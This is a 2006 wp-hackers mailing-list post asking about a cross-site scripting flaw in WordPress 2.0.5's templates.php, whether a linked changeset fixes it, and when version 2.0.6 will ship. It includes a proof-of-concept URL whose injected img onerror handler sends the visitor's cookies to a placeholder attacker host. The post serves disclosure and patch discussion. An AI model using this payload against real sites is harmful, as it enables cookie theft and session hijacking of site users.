[wp-hackers] Xss Vulnerability
dabos
daboslab at gmail.com
Thu Dec 28 14:56:39 GMT 2006
Hi Guys. Tell me more about this Xss Vulnerability for Wp 2.0.5 in
wp-admin/templates.php ?
Proof of concept:
https://blogsite/wp/wp-admin/templates.php?file=<img
src=""onerror=javascript:document.location.href='http://evilhacker/captureco
okie.php?'+document.cookie;>
Is this the solution: http://trac.wordpress.org/changeset/4665 ?
The last question, when the 2.0.6 final version ? Isn't this vulnerability
in the 2.0.6 Rc 1 ?
Dario Salvelli - ICT Junior Student, Italy
Web Site/Blog: www.dariosalvelli.com
Contact:
Gtalk - dariosalvelli-at-gmail-dot-com
Msn - el_cantore-at-hotmail-dot-it
Skype - dariosalvelli
> wp-hackers mailing list
> wp-hackers at lists.automattic.com
> http://lists.automattic.com/mailman/listinfo/wp-hackers
More information about the wp-hackers
mailing list